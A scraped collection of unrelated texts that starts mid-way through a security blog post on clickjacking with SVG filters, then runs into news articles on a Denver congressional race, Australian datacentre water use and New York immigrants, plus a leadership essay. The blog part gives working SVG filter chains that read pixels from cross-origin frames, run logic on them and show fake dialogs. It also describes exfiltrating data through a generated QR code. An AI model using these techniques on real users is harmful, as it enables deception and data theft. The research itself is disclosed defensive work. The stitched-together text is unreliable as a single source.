  <feBlend in2=white />
  <feBlend mode=difference in2=white />
  <feComposite operator=arithmetic k2=1 k4=0.02 />
</filter>

You can see how the textbox is entirely recontextualized now to fit a different design while still being fully functional.

Pixel reading

And now we come to what is most likely the most useful attack primitive - pixel reading. That’s right, you can use SVG filters to read color data off of images and perform all sorts of logic on them to create really advanced and convincing attacks.

The catch is of course, that you’ll have to do everything within SVG filters - there is no way to get the data out 6 . Despite that, it is very powerful if you get creative with it.

On a higher level, what this lets us do is make everything in a clickjacking attack responsive - fake buttons can have hover effects, pressing them can show fake dropdowns and dialogs, and we can even have fake form validation.

Let’s start off with a simple example - detecting if a pixel is pure black, and using it to turn another filter on or off.

<--- very cool! click to change color

For this target, we want to detect when the user clicks on the box to change its color, and use that to toggle a blur effect.

All the examples from here onwards are broken on Safari. Use Firefox or Chrome if you don't see them.

<--- very cool! click to change color

<feTile x="50" y="50"
        width="4" height="4" />
<feTile x="0" y="0"
        width="100%" height="100%" />

Let’s start off by using two copies of the feTile filter to first crop out the few pixels we’re interested in and then tile those pixels across the entire image.

The result is that we now have the entire screen filled with the color of the area we are interested in.

<--- very cool! click to change color

<feComposite operator=arithmetic k2=100 />

We can turn this result into a binary on/off value by using feComposite ’s arithmetic the same way as in the last section, but with a way larger k2 value. This makes it so that the output image is either completely black or completely white.

<--- very cool! click to change color

<feColorMatrix type=matrix
  values="0 0 0 0 0
          0 0 0 0 0
          0 0 0 0 0
          0 0 1 0 0" result=mask />
<feGaussianBlur in=SourceGraphic
                stdDeviation=3 />
<feComposite operator=in in2=mask />
<feBlend in2=SourceGraphic />

And just as before, this can be used as a mask. We once again convert it into an alpha matte, but this time apply it to the blur filter.

So that’s how you can find out whether a pixel is black and use that to toggle a filter!

<--- very cool! click to change color

Uh oh! It seems that somebody has changed the target to have a pride-themed button instead!

How can we adapt this technique to work with arbitrary colors and textures?

<--- very cool! click to change color

<!-- crop to first stripe of the flag -->
<feTile x="22" y="22"
        width="4" height="4" />
<feTile x="0" y="0" result="col"
        width="100%" height="100%" />
<!-- generate a color to diff against -->
<feFlood flood-color="#5BCFFA"
         result="blue" />
<feBlend mode="difference"
         in="col" in2="blue" />
<!-- k4 is for more lenient threshold -->
<feComposite operator=arithmetic
             k2=100 k4=-5 />
<!-- do the masking and blur stuff... -->
...

The solution is pretty simple - we can simply use feBlend ’s difference combined with a feColorMatrix to join the color channels to turn the image into a similar black/white matte as before. For textures we can use feImage , and for non-exact colors we can use a bit of feComposite ’s arithmetic to make the matching threshold more lenient.

And that’s it, a simple example of how we can read a pixel value and use it to toggle a filter.

Logic gates

But here’s the part where it gets fun! We can repeat the pixel-reading process to read out multiple pixels, and then run logic on them to program an attack.

By using feBlend and feComposite , we can recreate all logic gates and make SVG filters functionally complete . This means that we can program anything we want, as long as it is not timing-based 7 and doesn’t take up too many resources 8 .

Input:

NOT:
<feBlend mode=difference in2=white />

AND:
<feComposite operator=arithmetic k1=1 />

OR:
<feComposite operator=arithmetic k2=1 k3=1 />

XOR:
<feBlend mode=difference in=a in2=b />

NAND:
(AND + NOT)

NOR:
(OR + NOT)

XNOR:
(XOR + NOT)

These logic gates are what modern computers are made of. You could build a computer within an SVG filter if you wanted to. In fact, here’s a basic calculator I made:

This is a full adder circuit. This filter implements the logic gates S = A B C in for the output and C out = ( A B ) ( C in ( A B ) ) for the carry bit using the logic gates described above. There are more efficient ways to implement an adder in SVG filters, but this is meant to serve as proof of the ability to implement arbitrary logic circuits.

<!-- util -->
<feOffset in="SourceGraphic" dx="0" dy="0" result=src />
<feTile x="16px" y="16px" width="4" height="4" in=src />
<feTile x="0" y="0" width="100%" height="100%" result=a />
<feTile x="48px" y="16px" width="4" height="4" in=src />
<feTile x="0" y="0" width="100%" height="100%" result=b />
<feTile x="72px" y="16px" width="4" height="4" in=src />
<feTile x="0" y="0" width="100%" height="100%" result=c />
<feFlood flood-color=#FFF result=white />
<!-- A ⊕ B -->
<feBlend mode=difference in=a in2=b result=ab />
<!-- [A ⊕ B] ⊕ C -->
<feBlend mode=difference in2=c />
<!-- Save result to 'out' -->
<feTile x="96px" y="0px" width="32" height="32" result=out />
<!-- C ∧ [A ⊕ B] -->
<feComposite operator=arithmetic k1=1 in=ab in2=c result=abc />
<!-- (A ∧ B) -->
<feComposite operator=arithmetic k1=1 in=a in2=b />
<!-- [A ∧ B] ∨ [C ∧ (A ⊕ B)] -->
<feComposite operator=arithmetic k2=1 k3=1 in2=abc />
<!-- Save result to 'carry' -->
<feTile x="64px" y="32px" width="32" height="32" result=carry />
<!-- Combine results -->
<feBlend in2=out />
<feBlend in2=src result=done />
<!-- Shift first row to last -->
<feTile x="0" y="0" width="100%" height="32" />
<feTile x="0" y="0" width="100%" height="100%" result=lastrow />
<feOffset dx="0" dy="-32" in=done />
<feBlend in2=lastrow />
<!-- Crop to output -->
<feTile x="0" y="0" width="100%" height="100%" />

Anyways, for an attacker, what all of this means is that you can make a multi-step clickjacking attack with lots of conditions and interactivity. And you can run logic on data from cross-origin frames.

Securify

Welcome to this secure application!

This is an example target where we want to trick the user into marking themselves as hacked, which requires a few steps:

  • Clicking a button to open a dialog
  • Waiting for the dialog to load
  • Clicking a checkbox within the dialog
  • Clicking another button in the dialog
  • Checking for the red text that appeared

Securify

Welcome to this secure application!

Win free iPod by following the steps below.

1. Click here

2. Wait 3 seconds

3. Click

4. Click here

A traditional clickjacking attack against this target would be difficult to pull off. You’d need to have the user click on multiple buttons in a row with no feedback in the UI.

There are some tricks you could do to make a traditional attack more convincing than what you see above, but it’s still gonna look sketch af. And the moment you throw something like a text input into the mix, it’s just not gonna work.

Anyways, let’s build out a logic tree for a filter-based attack:

  • Is the dialog open?
    • (No) Is the red text present?
      • (No) Make the user press the button
      • (Yes) Show the end screen
    • (Yes) Is the dialog loaded?
      • (No) Show loading screen
      • (Yes) Is the checkbox checked?
        • (No) Make the user check the checkbox
        • (Yes) Make the user click the button

Which can be expressed in logic gates 9 as:

  • Inputs
    • D (dialog visible) = check for background dim
    • L (dialog loaded) = check for the button in dialog
    • C (checkbox checked) = check whether the button is blue or grey
    • R (red text visible) = feMorphology and check for red pixels
  • Outputs
    • D ) ∧ (¬ R ) => button1.png
    • D ∧ (¬ L ) => loading.png
    • D L ∧ (¬ C ) => checkbox.png
    • D L C => button2.png
    • D ) ∧ R => end.png

And this is how we would implement it in SVG:

<!-- util -->
<feTile x="14px" y="4px" width="4" height="4" in=SourceGraphic />
<feTile x="0" y="0" width="100%" height="100%" />
<feColorMatrix type=matrix result=debugEnabled
  values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0" />
<feFlood flood-color=#FFF result=white />
<!-- attack imgs -->
<feImage xlink:href="data:..." x=0 y=0 width=420 height=220 result=button1.png></feImage>
<feImage xlink:href="data:..." x=0 y=0 width=420 height=220 result=loading.png></feImage>
<feImage xlink:href="data:..." x=0 y=0 width=420 height=220 result=checkbox.png></feImage>
<feImage xlink:href="data:..." x=0 y=0 width=420 height=220 result=button2.png></feImage>
<feImage xlink:href="data:..." x=0 y=0 width=420 height=220 result=end.png></feImage>
<!-- D (dialog visible) -->
<feTile x="4px" y="4px" width="4" height="4" in=SourceGraphic />
<feTile x="0" y="0" width="100%" height="100%" />
<feBlend mode=difference in2=white />
<feComposite operator=arithmetic k2=100 k4=-1 result=D />
<!-- L (dialog loaded) -->
<feTile x="313px" y="141px" width="4" height="4" in=SourceGraphic />
<feTile x="0" y="0" width="100%" height="100%" result="dialogBtn" />
<feBlend mode=difference in2=white />
<feComposite operator=arithmetic k2=100 k4=-1 result=L />
<!-- C (checkbox checked) -->
<feFlood flood-color=#0B57D0 />
<feBlend mode=difference in=dialogBtn />
<feComposite operator=arithmetic k2=4 k4=-1 />
<feComposite operator=arithmetic k2=100 k4=-1 />
<feColorMatrix type=matrix
               values="1 1 1 0 0
                       1 1 1 0 0
                       1 1 1 0 0
                       1 1 1 1 0" />
<feBlend mode=difference in2=white result=C />
<!-- R (red text visible) -->
<feMorphology operator=erode radius=3 in=SourceGraphic />
<feTile x="17px" y="150px" width="4" height="4" />
<feTile x="0" y="0" width="100%" height="100%" result=redtext />
<feColorMatrix type=matrix
               values="0 0 1 0 0
                       0 0 0 0 0
                       0 0 0 0 0
                       0 0 1 0 0" />
<feComposite operator=arithmetic k2=2 k3=-5 in=redtext />
<feColorMatrix type=matrix result=R
               values="1 0 0 0 0
                       1 0 0 0 0
                       1 0 0 0 0
                       1 0 0 0 1" />
<!-- Attack overlays -->
<feColorMatrix type=matrix in=R
  values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0" />
<feComposite in=end.png operator=in />
<feBlend in2=button1.png />
<feBlend in2=SourceGraphic result=out />
<feColorMatrix type=matrix in=C
  values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0" />
<feComposite in=button2.png operator=in />
<feBlend in2=checkbox.png result=loadedGraphic />
<feColorMatrix type=matrix in=L
  values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0" />
<feComposite in=loadedGraphic operator=in />
<feBlend in2=loading.png result=dialogGraphic />
<feColorMatrix type=matrix in=D
  values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0" />
<feComposite in=dialogGraphic operator=in />
<feBlend in2=out />

Securify

Welcome to this secure application!

Play around with this and see just how much more convincing it is as an attack. And we could easily make it better by, for example, adding some extra logic to also add hover visuals to the buttons. The demo has debug visuals for the four inputs (D, L, C, R) in the bottom left as squares to make it easier to understand what’s going on.

But yeah, that’s how you can make complex and long clickjacking attacks that have not been realistic with the traditional clickjacking methods.

I kept this example here pretty short and simple, but real-world attacks can be a lot more involved and polished.

In fact…

The Docs bug

I’ve actually managed to pull off this attack against Google Docs!

Take a look at the demo videos here (alt links: bsky , twitter ).

What this attack does is:

  • Makes the user click on the “Generate Document” button
  • Once pressed, detects the popup and shows a textbox for the user to type a “captcha” into
    • The textbox starts off with a gradient animation, which must be handled
    • The textbox has focus states, which must also be present in the attack visuals, so they must be detected by the background color of the textbox
    • The textbox has grey text for both a placeholder AND suggestions, which must be hidden with the technique discussed earlier
  • Once the captcha is typed, makes the user seemingly click on a button (or press enter), which causes a suggested Docs item to be added into the textbox
    • This item must be detected by looking for its background color in the textbox
  • Once the item is detected, the textbox must be hidden and another button must be shown instead
    • Once that button is clicked, a loading screen appears, which must be detected
  • If the loading screen is present, or the dialog is not visible and the “Generate Document” button is not present, the attack is over and the final screen must be shown

In the past, individual parts of such an attack could’ve been pulled off through traditional clickjacking and some basic CSS, but the entire attack would’ve been way too long and complex to be realistic. With this new technique of running logic inside SVG filters, such attacks become realistic.

Google VRP awarded me $3133.70 for the find. That was, of course, right before they introduced a novelty bonus for new vulnerability classes. Hmph! 10

The QR attack

Something I see in online discussions often is the insistence on QR codes being dangerous. It kind of rubs me the wrong way because QR codes are not any more dangerous than links.

I don’t usually comment on this too much because it’s best to avoid suspicious links, and the same goes for QR codes, but it does nag me to see people make QR codes out to be this evil thing that can somehow immediately hack you.

I turns out though, that my SVG filters attack technique can be applied to QR codes as well!

The example from earlier in the blog with retyping a code becomes impractical once the user realizes they’re typing something they shouldn’t. We can’t stuff the data we exfiltrate into a link either, because an SVG filter cannot create a link.

But since an SVG filter can run logic and provide visual output, perhaps we could generate a QR code with a link instead?

Creating the QR

Creating a QR code within an SVG filter is easier said than done however. We can shape binary data into the shape of a QR code by using feDisplacementMap , but for a QR code to be scannable it also needs error correction data.

QR codes use Reed-Solomon error correction , which is some fun math stuff that’s a bit more advanced than a simple checksum. It does math with polynomials and stuff and that is a bit annoying to reimplement in an SVG.

Luckily for us, I’ve faced the same problem before! Back in 2021 I was the first person 11 to make a QR code generator in Minecraft , so I’ve already figured out the things necessary.

In my build I pre-calculated some lookup tables for the error correction, and used those instead to make the build simpler - and we can do the same with the SVG filter.

This post is already getting pretty long, so I’ll leave figuring out how this filter works as an exercise to the reader ;).

Hover to see QR

This is a demo that displays a QR code telling you how many seconds you’ve been on this page for. It’s a bit fiddly, so if it doesn’t work make sure that you aren’t using any display scaling or a custom color profile . On Windows you can toggle the Automatically manage color for apps setting, and on a Mac you can set the color profile to sRGB for it to work.

This demo does not work on mobile devices . And also, for the time being, it only works in Chromium-based browsers , but I believe it could be made to work in Firefox too.

Similarly, in a real attack, the scaling and color profile issues could be worked around using some JavaScript tricks or simply by implementing the filter a bit differently - this here is just a proof of concept that’s a bit rough around the edges.

But yeah, that’s a QR code generator built inside and SVG filter!

Took me a while to make, but I didn’t want to write about it just being “theoretically possible”.

Attack scenario

So the attack scenario with the QR code is that you’d read pixels from a frame, process them to extract the data you want, encode them into a URL that looks something like https://lyra. horse /?ref=c3VwZXIgc2VjcmV0IGluZm8 and render it as a QR code.

Then, you prompt the user to scan the QR code for whatever reason (eg anti-bot check). To them, the URL will seem like just a normal URL with a tracking ID or something in it.

Once the user opens the URL, your server gets the request and receives the data from the URL.

And so on..

There are so many ways to make use of this technique I won’t have time to go over them all in this post. Some examples would be reading text by using the difference blend mode, or exfiltrating data by making the user click on certain parts of the screen.

You could even insert data from the outside to have a fake mouse cursor inside the SVG that shows the pointer cursor and reacts to fake buttons inside your SVG to make the exfiltration more realistic.

Or you could code up attacks with CSS and SVG where CSP doesn’t allow for any JS.

Anyways, this post is long as is, so I’ll leave figuring out these techniques as homework.

Novel technique

This is the first time in my security research I’ve found a completely new technique!

I introduced it briefly at my BSides talk in September , and this post here is a more in-depth overview of the technique and how it can be used.

Of course, you can never know 100% for sure that a specific type of attack has never been found by anyone else, but my extensive search of existing security research has come up with nothing, so I suppose I can crown myself as the researcher who discovered it?

Here’s some previous research I’ve found:

I don’t think me discovering this technique was just luck though. I have a history of seeing things such as CSS as programming languages to exploit and be creative with. It wasn’t a stretch for me to see SVG filters as a programming language either.

That, and my overlap between security research and creative projects - I often blur the lines between the two, which is what Antonymph was born out of.

In any case, it feels yay :3 woof yippie waow awesome meow awrf to discover something like this.

afterword

whoa this post took such a long time for me to get done!

i started work on it in july, and was expecting to release it alongside my CSS talk in september, but it has taken me so much longer than expected to actually finish this thing. i wanted to make sure it was a good in-depth post, rather than something i just get out as soon as possible.

unlike my previous posts, i did unfortunately have to break my trend of using no images, since i needed a few data URIs within the SVG filters for demos. still, no images anywhere else in the post, no javascript, and just 42kB (gzip) of handcrafted html/css/svg.

also, i usually hide a bunch of easter eggs in my post that link to stuff i’ve enjoyed recently, but i have a couple links i didn’t want to include without content warnings. finding responsibility is a pretty dark talk about the ethics of making sure your work won’t end up killing people, and youre the one ive always wanted is slightly nsfw doggyhell vent art.

btw i’ll soon be giving talks at 39c3 and disobey 2026 ! the 39c3 one is titled “ css clicker training ” and will be about css crimes and making games in css. and the disobey one is the same talk as the bsides one about using css to hack stuff and get bug bounties, but i’ll make sure to throw some extra content in there to keep it fun.

see y’all around!!

<3

Discuss this post on: twitter , mastodon , lobsters

She Lost Her Job for Speaking Out About Gaza. Can It Power Her to Congress?

Intercept
theintercept.com
2025-12-04 14:02:58
Justice Democrats endorsed Melat Kiros in Denver as the progressive group looks to recover from crushing losses to AIPAC-backed candidates last cycle. The post She Lost Her Job for Speaking Out About Gaza. Can It Power Her to Congress? appeared first on The Intercept....
Original Article

Attorney Melat Kiros lost her job in 2023 after she wrote a post on Medium criticizing law firms, including her own, for opposing pro-Palestine protests and “chilling future lawyers’ employment prospects for criticism of the Israeli government’s actions and its legitimacy.” Now, she’s running for Congress to replace a nearly three-decade incumbent in Denver and calling to end U.S. military aid to Israel.

The progressive outfit Justice Democrats announced Thursday it was endorsing Kiros, who first launched her campaign in July . She’s the sixth candidate the group is backing in the upcoming midterm primaries, as Justice Democrats recharts its course after pro-Israel groups last cycle helped oust two of its star recruits, Reps. Jamaal Bowman , D-N.Y., and Cori Bush , D-Mo.

In an interview with The Intercept, Kiros, who is 28, said watching Bowman and Bush lose their races and President Donald Trump take back the White House fueled despair among people her age. “But ultimately there are things that we can do, common-sense policies that we can pass — like Medicare for All, housing first, universal child care — that we just need people in Congress that actually represent us and not their wealthy donors to fight for,” she said.

“They wish they could speak up too, but … they couldn’t afford to lose their health insurance.”

Kiros has also been motivated by what she described as a “coercive market” that has chilled speech against genocide in Gaza. She decided to write the post that ultimately led to her firing after her experience protesting another genocide in her hometown of Tigray, Ethiopia. After she lost her job, she took on policy work in a Ph.D. program, which eventually motivated her to run for Congress.

“I got messages from hundreds of attorneys afterwards saying that they wish they could speak up too, but that they couldn’t afford to lose their job, that they couldn’t afford to lose their health insurance,” Kiros said. She doesn’t think there’s true freedom of expression exists “when you can’t speak out on basic human rights without it risking your job.”

In Congress, Kiros hopes to take on the issue of big money in politics — not just how it shapes policy, but how it has chilled speech on matters of human rights.

In her campaign against Rep. Diana DeGette, who was elected the year before she was born, Kiros is arguing the incumbent has grown more disconnected from her constituents over her 28 years in Congress — and embodies the Democratic Party’s failures to deliver in the face of a right-wing assault on civil liberties and the corporate and elite capture of bipartisan politics.

“DeGette is a symptom of a political system that rewards complacency, not courage,” Justice Democrats wrote in its endorsement of Kiros. The group has focused its 2026 strategy on challenging incumbents it says are beholden to corporate donors and trying to build a bench in Congress to fight authoritarianism, corporate super PACs, and billionaire-funded lobbying groups like the American Israel Public Affairs Committee.

DeGette did not respond to requests for comment before publication.

DeGette’s campaign, meanwhile, is highlighting what she describes as her experience fighting to protect the environment and expand access to health care. As a longtime incumbent, she has a clear fundraising advantage: DeGette has raised just under half a million dollars this year, more than three times the $125,000 Kiros has raised so far.

Kiros said most of her campaign funds have come from more than 2,300 individual donors, most of them small-dollar, with an average donation of $47, though the campaign’s latest FEC filings only reflect about 300 individual donors. ( FEC records do not always include contributions from donors who have given under $200.)

In addition to Kiros, five other Democratic candidates are currently slated to challenge DeGette, including veteran Wanda James , a member of the University of Colorado Board of Regents.

Speaking to The Intercept, Kiros criticized DeGette for taking more than $5 million throughout her career from corporate PACs. Justice Democrats has also denounced her for taking money from lobbies for the pharmaceutical, fossil fuel, and defense industries. According to OpenSecrets, DeGette’s top career contributor is the law and lobbying firm Brownstein Hyatt Farber Schreck, founded and chaired by attorney and former AIPAC Vice President and board member Norman Brownstein .

After taking crushing losses in two high-profile races in which AIPAC spent heavily last cycle, Justice Democrats has endorsed five other candidates so far this cycle, challenging incumbents in five states. That includes Bush in her comeback run for her old seat in Missouri’s 1st Congressional District, state Rep. Justin Pearson in Tennessee’s 9th District, Darializa Avila Chevalier in New York’s 13th District, Angela Gonzales Torres in California’s 34th District, and state Rep. Donavan McKinney in Michigan’s 13th District. The group is “on track” to endorse at least 10 new candidates by January, according to its spokesperson, Usamah Andrabi.

The strategy is a shift from 2024, when Justice Democrats only endorsed its incumbents after making its name backing new insurgent candidates.

“We started this cycle with clear eyes about our intentions to fight back and win against AIPAC, crypto, and every other corporate lobby by challenging as many entrenched corporate incumbents and electing real, working-class champions to lead this party forward,” Andrabi said.

Growing disapproval of both the Democratic Party and Trump has proven how much Democratic voters want to use the primary system to change a party they see as bought by billionaires, Andrabi said.

“The momentum of the Democratic Party’s base is on our side and lobbies like AIPAC are losing sway over voters as their spending, influence, and right-wing network is exposed,” he said. “We’re not holding back this cycle and the establishment feels it.”

Fueling that disillusionment is the United States’ role in Israel’s genocide in Gaza, which Kiros has made a focus of her campaign. She’s calling for an end to U.S. military aid to Israel and an Israeli arms embargo , and has called DeGette out of step with the district for not signing onto a bill pushing for the latter.

DeGette has a mixed record on Israel. She has described herself as a longtime supporter of Israel, taken some money from pro-Israel groups throughout her career, and met with members of AIPAC in her district.

In the weeks after the October 7, 2023 attacks, DeGette voted with 193 other Democrats against a Republican bill — which former President Joe Biden had threatened to veto — to provide aid to Israel, saying it ignored humanitarian needs in Gaza. She voted with the bulk of her party for other pro-Israel bills after October 7, including a hawkish bill affirming Israel’s right to self-defense with no mention of Palestinian civilians . DeGette did not co-sponsor an alternative resolution introduced by then-Rep. Bush and Rep. Rashida Tlaib, D-Mich., which called for an immediate ceasefire and humanitarian aid to Gaza. This year, DeGette co-sponsored bills to prevent violence in the West Bank and restore funding to the United Nations Relief and Works Agency for Palestine Refugees.

”It’s not enough that you vote the right way,” said Kiros. “This idea that any Democrat will do — it’s not enough anymore.”

Thirsty work: how the rise of massive datacentres strains Australia’s drinking water supply

Guardian
www.theguardian.com
2025-12-04 14:00:24
The demand for use in cooling in Sydney alone is expected to exceed the volume of Canberra’s total drinking water within the next decadeSign up for climate and environment editor Adam Morton’s free Clear Air newsletter hereAs Australia rides the AI boom with dozens of new investments in datacentres ...
Original Article

A s Australia rides the AI boom with dozens of new investments in datacentres in Sydney and Melbourne, experts are warning about the impact these massive projects will have on already strained water resources.

Water demand to service datacentres in Sydney alone is forecast to be larger than the volume of Canberra’s total drinking water within the next decade.

In Melbourne the Victorian government has announced a “$5.5m investment to become Australia’s datacentre capital”, but the hyperscale datacentre applications on hand already exceed the water demands of nearly all of the state’s top 30 business customers combined.

Technology companies, including Open AI and Atlassian, are pushing for Australia to become a hub for data processing and storage. But with 260 datacentres operating and dozens more in the offing, experts are flagging concerns about the impact on the supply of drinking water.

Sydney Water has estimated up to 250 megalitres a day would be needed to service the industry by 2035 (a larger volume than Canberra’s total drinking water ).

Cooling requires ‘huge amount of water’

Prof Priya Rajagopalan, director of the Post Carbon Research Centre at RMIT, says water and electricity demands of datacentres depend on the cooling technology used.

“If you’re just using evaporative cooling, there is a lot of water loss from the evaporation, but if you are using sealers, there is no water loss but it requires a huge amount of water to cool,” she says.

While older datacentres tend to rely on air cooling, demand for more computing power means higher server rack density so the output is warmer, meaning centres have turned to water for cooling .

The amount of water used in a datacentre can vary greatly. Some centres, such as NextDC, are moving towards liquid-to-chip cooling, which cools the processor or GPU directly instead of using air or water to cool the whole room.

NextDC says it has completed an initial smaller deployment of the cooling technology but it has the capacity to scale up for ultra-high-density environments to allow for greater processing power without an associated rise in power consumption because liquid cooling is more efficient. The company says its modelling suggests power usage effectiveness (PUE, a measure of energy efficiency) could go as low as 1.15.

Sign up to get climate and environment editor Adam Morton’s Clear Air column as a free newsletter

The datacentre industry accounts for its sustainability with two metrics: water usage effectiveness (WUE) and power usage effectiveness (PUE). These measure the amount of water or power used relative to computing work.

WUE is measured by annual water use divided by annual IT energy use (kWh). For example, a 100MW datacentre using 3ML a day would have a WUE of 1.25. The closer the number is to 1, the more efficient it is. Several countries mandate minimum standards. Malaysia has recommended a WUE of 1.8, for example.

But even efficient facilities can still use large quantities of water and energy, at scale.

NextDC’s PUE in the last financial year was 1.44, up from 1.42 the previous year, which the company says “reflects the dynamic nature of customer activity across our fleet and the scaling up of new facilities”.

Calls for ban on use of drinking water

Sydney Water says its estimates of datacentre water use are being reviewed regularly. The utility is exploring climate-resilient and alternative water sources such as recycled water and stormwater harvesting to prepare for future demand.

“All proposed datacentre connections are individually assessed to confirm there is sufficient local network capacity and operators may be required to fund upgrades if additional servicing is needed,” a Sydney Water spokesperson says.

In its submission to the Victorian pricing review for 2026 to 2031, Melbourne Water noted that hyperscale datacentre operators that have put in applications for connections have “projected instantaneous or annual demands exceeding nearly all top 30 non-residential customers in Melbourne”.

“We have not accounted for this in our demand forecasts or expenditure planning,” Melbourne Water said.

It has sought upfront capital contributions from the companies so the financial burden of works required “does not fall on the broader customer base”.

Greater Western Water in Victoria had 19 datacentre applications on hand, according to documents obtained by the ABC , and provided to the Guardian.

skip past newsletter promotion

The Concerned Waterways Alliance, a network of Victorian community and environment groups, has flagged its concerns about the diversion of large volumes of drinking water to cool servers, when many of the state’s water resources are already stretched.

Cameron Steele, a spokesperson for the alliance, says datacentre growth could increase Melbourne’s reliance on desalinated water and reduce water available for environmental flows, with the associated costs borne by the community. The groups have called for a ban on the use of drinking water for cooling, and mandatory public reporting of water use for all centres.

“We would strongly advocate for the use of recycled water for datacentres rather than potable drinking water.”

Closed-loop cooling

In hotter climates, such as large parts of Australia during the summer months, centres require more energy or water to keep cool.

Danielle Francis, manager of customer and policy at the Water Services Association of Australia, says there isn’t a one-size-fits-all approach for how much energy and water datacentres use because it will depend on the local constraints such as land, noise restrictions and availability of water.

“We’re always balancing all the different customers, and that’s the need for residential areas and also non-residential customers, as well as of course environmental needs,” Francis says.

“It is true that there are quite a lot of datacentre applications. And the cumulative impact is what we have to plan for … We have to obviously look at what the community impact of that is going to be.

“And sometimes they do like to cluster near each other and be in a similar location.”

One centre under construction in Sydney’s Marsden Park is a 504MW datacentre spanning 20 hectares, with six four-storey buildings. The CDC centre will become the largest data campus in the southern hemisphere, the company has boasted.

In the last financial year, CDC used 95.8% renewable electricity in its operational datacentres, and the company boasts a PUE of 1.38 and a WUE of 0.01. A spokesperson for the company says it has been able to achieve this through a closed-loop cooling system that eliminates ongoing water draw, rather than relying on the traditional evaporative cooling systems.

“The closed-loop systems at CDC are filled once at the beginning of their life and operate without ongoing water draw, evaporation or waste, ensuring we are preserving water while still maintaining thermal performance,” a spokesperson says.

“It’s a model designed for Australia, a country shaped by drought and water stress, and built for long-term sustainability and sets an industry standard.”

Planning documents for the centre reveal that, despite CDC’s efforts, there remains some community concern over the project.

In a June letter, the acting chief executive of the western health district of New South Wales , Peter Rophail, said the development was too close to vulnerable communities, and the unprecedented scale of the development was untested and represented an unsuitable risk to western Sydney communities.

“The proposal does not provide any assurance that the operation can sufficiently adjust or mitigate environmental exposures during extreme heat weather events so as not to pose an unreasonable risk to human health,” Rophail said.

West African Asylum Seekers Find Safe Haven in NYC Volunteer-Run Kitchen

Democracy Now!
www.democracynow.org
2025-12-04 13:46:55
Amid escalating ICE raids in New York City, Democracy Now’s Messiah Rhodes spoke to immigrants and advocates supporting newly arrived migrants and asylum seekers from West Africa with hot meals, legal advice and job training. “When I help the people here, the people will help me one day,...
Original Article

Hi there,

In this age of widespread misinformation and increased threats to press freedom, support for independent journalism is more important than ever. Media is essential to the functioning of a democratic society. Please donate today, so we can keep delivering urgent reporting on the world’s most pressing issues.

Every dollar makes a difference

. Thank you so much!

Democracy Now!
Amy Goodman

Non-commercial news needs your support.

We rely on contributions from you, our viewers and listeners to do our work. If you visit us daily or weekly or even just once a month, now is a great time to make your monthly contribution.

Please do your part today.

Donate

Independent Global News

Donate

Amid escalating ICE raids in New York City, Democracy Now! ’s Messiah Rhodes spoke to immigrants and advocates supporting newly arrived migrants and asylum seekers from West Africa with hot meals, legal advice and job training. “When I help the people here, the people will help me one day,” Guinean immigrant Abdul Karim, a cook at Cafewal weekday kitchen, told Rhodes.

Murad Awawdeh, of the New York Immigration Coalition and a member of New York City Mayor-elect Zohran Mamdani’s transition team, also comments. He shares how the incoming mayoral administration can work to protect immigrants from Trump’s anti-immigrant agenda.



Guests

Please check back later for full transcript.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Non-commercial news needs your support

We rely on contributions from our viewers and listeners to do our work.
Please do your part today.

Make a donation

Transparent Leadership Beats Servant Leadership

Hacker News
entropicthoughts.com
2025-12-04 13:40:00
Comments...
Original Article

tl:dr : Parenting and leadership is similar. Teach a man to fish, etc.


I spent a couple of years managing a team, and I entered that role – like many – without knowing anything about how to do it. I tried to figure out how to be a good manager, and doing so I ended up reading a lot about servant leadership . It never quite sat right with me, though. Servant leadership seems to me a lot like curling parenting: the leader/parent anticipate problems and sweep the way for their direct reports/children.

To be clear, this probably feels very good (initially, anyway) for the direct reports/children. But the servant leader/curling parent quickly becomes an overworked single point of failure, and once they leave there is nobody else who knows how to handle the obstacles the leader moved out of the way for everyone. In the worst cases, they leave behind a group of people who have been completely isolated from the rest of the organisation, and has no idea what their purpose is and how to fit in with the rest of the world.

I would like to invent my own buzzword: transparent leadership . In my book, a good leader

  • coaches people,
  • connects people,
  • teaches people methodical problem solving,
  • explains values and principles embraced by the organisation to aid them in making aligned decisions on their own,
  • creates direct links between supply and demand (instead of deliberately making themselves a middle man),
  • allows their direct reports career growth by gradually taking over leadership responsibilities,
  • continuously trains their replacement, and
  • generally makes themselves redundant.

The middle manager that doesn’t perform any useful work is a fun stereotype, but I also think it’s a good target to aim for. The difference lies in what to do once one has rendered oneself redundant. A common response is to invent new work, ask for status reports, and add bureaucracy.

A better response is to go back to working on technical problems. This keeps the manager’s skills fresh and gets them more respect from their reports. The manager should turn into a high-powered spare worker, rather than a paper-shuffler.

"Making America White Again": Trump Further Restricts Immigration, Ramps Up ICE Raids

Democracy Now!
www.democracynow.org
2025-12-04 13:37:30
Immigrant rights advocate Murad Awawdeh joins us to discuss Donald Trump’s nationwide anti-immigrant crackdown and how it’s manifested in Trump’s hometown of New York City, where hundreds of New Yorkers recently blocked a federal immigration raid targeting street vendors from West ...
Original Article

Hi there,

In this age of widespread misinformation and increased threats to press freedom, support for independent journalism is more important than ever. Media is essential to the functioning of a democratic society. Please donate today, so we can keep delivering urgent reporting on the world’s most pressing issues.

Every dollar makes a difference

. Thank you so much!

Democracy Now!
Amy Goodman

Non-commercial news needs your support.

We rely on contributions from you, our viewers and listeners to do our work. If you visit us daily or weekly or even just once a month, now is a great time to make your monthly contribution.

Please do your part today.

Donate

Independent Global News

Donate

Immigrant rights advocate Murad Awawdeh joins us to discuss Donald Trump’s nationwide anti-immigrant crackdown and how it’s manifested in Trump’s hometown of New York City, where hundreds of New Yorkers recently blocked a federal immigration raid targeting street vendors from West Africa before it even started. “This has never been about vetting. This has never been about security and safety. It’s about cruelty,” says Awawdeh about the Trump administration’s persecution of immigrants. “His war on immigrants and his mass deportation agenda is all to lead to making America white again.”



Guests

Please check back later for full transcript.

